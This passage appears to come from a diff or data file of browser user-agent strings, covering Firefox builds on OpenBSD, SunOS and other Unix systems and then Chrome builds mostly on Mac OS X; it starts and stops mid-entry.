Gecko/20060213 Firefox/1.5.0.1 +Mozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.8.0.4) Gecko/20060628 Firefox/1.5.0.4 +Mozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.8.0.5) Gecko/20060819 Firefox/1.5.0.5 +Mozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.8.0.7) Gecko/20060920 Firefox/1.5.0.7 +Mozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.8.0.7) Gecko/20061017 Firefox/1.5.0.7 +Mozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.8.0.8) Gecko/20061110 Firefox/1.5.0.8 +Mozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.8.1.16) Gecko/20080812 Firefox/2.0.0.16 +Mozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.8.1.3) Gecko/20070505 Firefox/2.0.0.3 +Mozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.8.1.4) Gecko/20070704 Firefox/2.0.0.4 +Mozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.8.1.4) Gecko/20070704 Firefox/2.0.0.6 +Mozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.8.1.4) Gecko/20071127 Firefox/2.0.0.11 +Mozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.8.1.6) Gecko/20070819 Firefox/2.0.0.6 +Mozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.8.1.7) Gecko/20070930 Firefox/2.0.0.7 +Mozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.9.2.20) Gecko/20110803 Firefox/3.6.20 +Mozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.9.2.8) Gecko/20101230 Firefox/3.6.8 +Mozilla/5.0 (X11; U; OpenBSD sparc64; en-AU; rv:1.8.1.6) Gecko/20071225 Firefox/2.0.0.6 +Mozilla/5.0 (X11; U; OpenBSD sparc64; en-CA; rv:1.8.0.2) Gecko/20060429 Firefox/1.5.0.2 +Mozilla/5.0 (X11; U; OpenBSD sparc64; en-US; rv:1.8.1.6) Gecko/20070816 Firefox/2.0.0.6 +Mozilla/5.0 (X11; U; OpenBSD sparc64; pl-PL; rv:1.8.0.2) Gecko/20060429 Firefox/1.5.0.2 +Mozilla/5.0 (X11; U; Slackware Linux i686; en-US; rv:1.9.0.10) Gecko/2009042315 Firefox/3.0.10 +Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.7.12) Gecko/20051121 Firefox/1.0.7 (Nexenta package 1.0.7) +Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.7.5) Gecko/20041109 Firefox/1.0 +Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.8.0.5) Gecko/20060728 Firefox/1.5.0.5 +Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.8.1.3) Gecko/20070423 Firefox/2.0.0.3 +Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.8.1.4) Gecko/20070622 Firefox/2.0.0.4 +Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.8.1) Gecko/20061024 Firefox/2.0 +Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.8.1) Gecko/20061211 Firefox/2.0 +Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.9.0.4) Gecko/2008111710 Firefox/3.0.4 +Mozilla/5.0 (X11; U; SunOS i86pc; en-ZW; rv:1.8.1.6) Gecko/20071125 Firefox/2.0.0.6 +Mozilla/5.0 (X11; U; SunOS i86pc; fr; rv:1.9.0.4) Gecko/2008111710 Firefox/3.0.4 +Mozilla/5.0 (X11; U; SunOS sun4u; de-DE; rv:1.8.1.6) Gecko/20070805 Firefox/2.0.0.6 +Mozilla/5.0 (X11; U; SunOS sun4u; de-DE; rv:1.9.1b4) Gecko/20090428 Firefox/2.0.0.0 +Mozilla/5.0 (X11; U; SunOS sun4u; en-GB; rv:1.8.0.1) Gecko/20060206 Firefox/1.5.0.1 +Mozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:1.7.12) Gecko/20050922 Firefox/1.0.7 +Mozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:1.7.12) Gecko/20050927 Firefox/1.0.7 +Mozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:1.7.8) Gecko/20050512 Firefox/1.0.4 +Mozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:1.8.0.1) Gecko/20060206 Firefox/1.5.0.1 +Mozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:1.8.0.7) Gecko/20060915 Firefox/1.5.0.7 +Mozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:1.8.1.11) Gecko/20080118 Firefox/2.0.0.11 +Mozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:1.8.1.12) Gecko/20080210 Firefox/2.0.0.12 +Mozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:1.8.1.14) Gecko/20080418 Firefox/2.0.0.14 +Mozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:1.8.1.20) Gecko/20090108 Firefox/2.0.0.20 +Mozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:1.8.1.2) Gecko/20070226 Firefox/2.0.0.2 +Mozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:1.8.1.3) Gecko/20070321 Firefox/2.0.0.3 +Mozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:1.8.1.4) Gecko/20070531 Firefox/2.0.0.4 +Mozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:1.8.1.4) Gecko/20070622 Firefox/2.0.0.4 +Mozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:1.8.1.9) Gecko/20071102 Firefox/2.0.0.9 +Mozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:1.8.1) Gecko/20061024 Firefox/2.0 +Mozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:1.8.1) Gecko/20061228 Firefox/2.0 +Mozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:1.8) Gecko/20051130 Firefox/1.5 +Mozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:1.9b5) Gecko/2008032620 Firefox/3.0b5 +Mozilla/5.0 (X11; U; SunOS sun4u; it-IT;) Gecko/20080000 Firefox/3.0 +Mozilla/5.0 (X11; U; SunOS sun4u; pl-PL; rv:1.8.1.6) Gecko/20071217 Firefox/2.0.0.6 +Mozilla/5.0 (X11; U; SunOS sun4v; en-US; rv:1.8.1.3) Gecko/20070321 Firefox/2.0.0.3 +Mozilla/5.0 (X11; U; SunOS sun4v; es-ES; rv:1.8.1.9) Gecko/20071127 Firefox/2.0.0.9 +Mozilla/5.0 (X11; U; Windows NT 5.0; en-US; rv:1.9b4) Gecko/2008030318 Firefox/3.0b4 +Mozilla/5.0 (X11; U; Windows NT 5.1; en-US; rv:1.9.0.7) Gecko/2009021910 Firefox/3.0.7 +Mozilla/5.0 (X11; U; Windows NT i686; fr; rv:1.9.0.1) Gecko/2008070206 Firefox/2.0.0.8 +Mozilla/5.0 (X11; U; x86_64 Linux; en_GB, en_US; rv:1.9.2) Gecko/20100115 Firefox/3.6 +Mozilla/5.0 (X11; U; x86_64 Linux; en_US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7 +Mozilla/5.0 (X11; U; x86_64 Linux; en_US; rv:1.8.16) Gecko/20071015 Firefox/2.0.0.8 +Mozilla/5.0 (X11; U; x86_64 Linux; en_US; rv:1.9.0.5) Gecko/2008120121 Firefox/3.0.5 +Mozilla/5.0 (ZX-81; U; CP/M86; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1 +Mozilla/6.0 (Macintosh; I; Intel Mac OS X 11_7_9; de-LI; rv:1.9b4) Gecko/2012010317 Firefox/10.0a4 +Mozilla/6.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:2.0.0.0) Gecko/20061028 Firefox/3.0 +Mozilla/6.0 (Windows NT 6.2; WOW64; rv:16.0.1) Gecko/20121011 Firefox/16.0.1 +Mozilla/6.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8 +Mozilla/6.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8 (.NET CLR 3.5.30729) +Mozilla/6.0 (Windows; U; Windows NT 7.0; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.9 (.NET CLR 3.5.30729) + +# Google Chrome + +Mozilla/4.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/11.0.1245.0 Safari/537.36 +Mozilla/4.0 (Windows; U; Windows NT 5.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0 +Mozilla/4.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.59 Safari/525.19 +Mozilla/5.0 ArchLinux (X11; Linux x86_64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41 Safari/535.1 +Mozilla/5.0 ArchLinux (X11; U; Linux x86_64; en-US) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.100 +Mozilla/5.0 ArchLinux (X11; U; Linux x86_64; en-US) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.100 Safari/534.30 +Mozilla/5.0 ArchLinux (X11; U; Linux x86_64; en-US) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.60 Safari/534.30 +Mozilla/5.0 (Linux; U; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.27 Safari/525.13 +Mozilla/5.0 (Macintosh; AMD Mac OS X 10_8_2) AppleWebKit/535.22 (KHTML, like Gecko) Chrome/18.6.872 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_5_8) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_5_8) AppleWebKit/534.31 (KHTML, like Gecko) Chrome/13.0.748.0 Safari/534.31 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_5_8) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.66 Safari/535.11 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_5_8) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.151 Safari/535.19 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_5_8) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.801.0 Safari/535.1 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_5_8) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.803.0 Safari/535.1 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_0) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.79 Safari/537.4 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_2) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.107 Safari/535.1 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_2) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41 Safari/535.1 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_3) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.32 Safari/535.1 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_3) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41 Safari/535.1 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_4) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.100 Safari/534.30 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_4) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.112 Safari/534.30 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_4) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.65 Safari/535.11 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_6) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.12 Safari/534.24 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_6) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.698.0 Safari/534.24 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_6) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.112 Safari/534.30 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_7) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_7) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41 Safari/535.1 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_7) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.790.0 Safari/535.1 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_7) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.803.0 Safari/535.1 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_7) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.813.0 Safari/535.1 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.71 Safari/534.24 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.68 Safari/534.30 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.66 Safari/535.11 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.11 Safari/535.19 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.166 Safari/535.19 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.45 Safari/535.19 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.24 Safari/535.1 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.861.0 Safari/535.2 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.54 Safari/535.2 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.36 Safari/535.7 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.0 Safari/534.24 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.100 Safari/534.30 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.65 Safari/535.11 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.794.0 Safari/535.1 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.803.0 Safari/535.1 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.861.0 Safari/535.2 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_2) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.65 Safari/535.11 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_2) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.66 Safari/535.11 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_2) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.45 Safari/535.19 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_2) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.215 Safari/535.1 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_2) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.834.0 Safari/535.1 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_2) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_2) AppleWebKit/535.24 (KHTML, like Gecko) Chrome/19.0.1055.1 Safari/535.24 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.66 Safari/535.11 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.20 (KHTML, like Gecko) Chrome/19.0.1036.7 Safari/535.20 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.22 (KHTML, like Gecko) Chrome/19.0.1047.0 Safari/535.22 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/537.13 (KHTML, like Gecko) Chrome/24.0.1290.1 Safari/537.13 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1664.3 Safari/537.36 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_2) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.6 Safari/537.11 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_2) AppleWebKit/537.13 (KHTML, like Gecko) Chrome/24.0.1290.1 Safari/537.13 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_2) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1309.0 Safari/537.17 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1664.3 Safari/537.36 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36 +Mozilla/5.0 (Macintosh; PPC Mac OS X 10_6_7) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.790.0 Safari/535.1 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/ Safari/530.5 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-US) AppleWebKit/530.6 (KHTML, like Gecko) Chrome/ Safari/530.6 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-US) AppleWebKit/530.9 (KHTML, like Gecko) Chrome/ Safari/530.9 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.202.0 Safari/532.0 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-US) AppleWebKit/531.3 (KHTML, like Gecko) Chrome/3.0.192 Safari/531.3 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.196 Safari/532.0 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.198 Safari/532.0 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.202.0 Safari/532.0 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.212.1 Safari/532.1 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.197 Safari/532.0 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.198 Safari/532.0 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.202.0 Safari/532.0 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.203.0 Safari/532.0 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.207.0 Safari/532.0 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.208.0 Safari/532.0 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.210.0 Safari/532.0 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.211.2 Safari/532.0 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.8 Safari/532.2 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.222.2 Safari/532.2 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.222.5 Safari/532.2 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.302.2 Safari/532.8 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/533.2 (KHTML, like Gecko) Chrome/5.0.343.0 Safari/533.2 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/534.1 (KHTML, like Gecko) Chrome/6.0.422.0 Safari/534.1 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/534.2 (KHTML, like Gecko) Chrome/6.0.453.1 Safari/534.2 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_0; en-US) AppleWebKit/528.10 (KHTML, like Gecko) Chrome/2.0.157.2 Safari/528.10 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.202.0 Safari/532.0 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.203.0 Safari/532.0 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.203.4 Safari/532.0 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.204.0 Safari/532.0 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.206.1 Safari/532.0 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_0; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.212.1 Safari/532.1 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_0; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.307.11 Safari/532.9 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.86 Safari/533.4 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.207.0 Safari/532.0 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.209.0 Safari/532.0 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.211.2 Safari/532.0 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.212.0 Safari/532.0 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.8 Safari/532.2 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.222.4 Safari/532.2 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.86 Safari/533.4 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-US) AppleWebKit/530.6 (KHTML, like Gecko) Chrome/2.0.174.0 Safari/530.6 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-US) AppleWebKit/533.2 (KHTML, like Gecko) Chrome/5.0.343.0 Safari/533.2 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.366.0 Safari/533.4 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.70 Safari/533.4 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Chrome/5.0.363.0 Safari/533.3 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.366.0 Safari/533.4 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-US) AppleWebKit/534.1 (KHTML, like Gecko) Chrome/6.0.428.0 Safari/534.1 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-US) AppleWebKit/534.2 (KHTML, like Gecko) Chrome/6.0.453.1 Safari/534.2 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.456.0 Safari/534.3 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-US) AppleWebKit/533.2 (KHTML, like Gecko) Chrome/5.0.342.7 Safari/533.2 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.210 Safari/534.10 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.0 Safari/534.13 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; 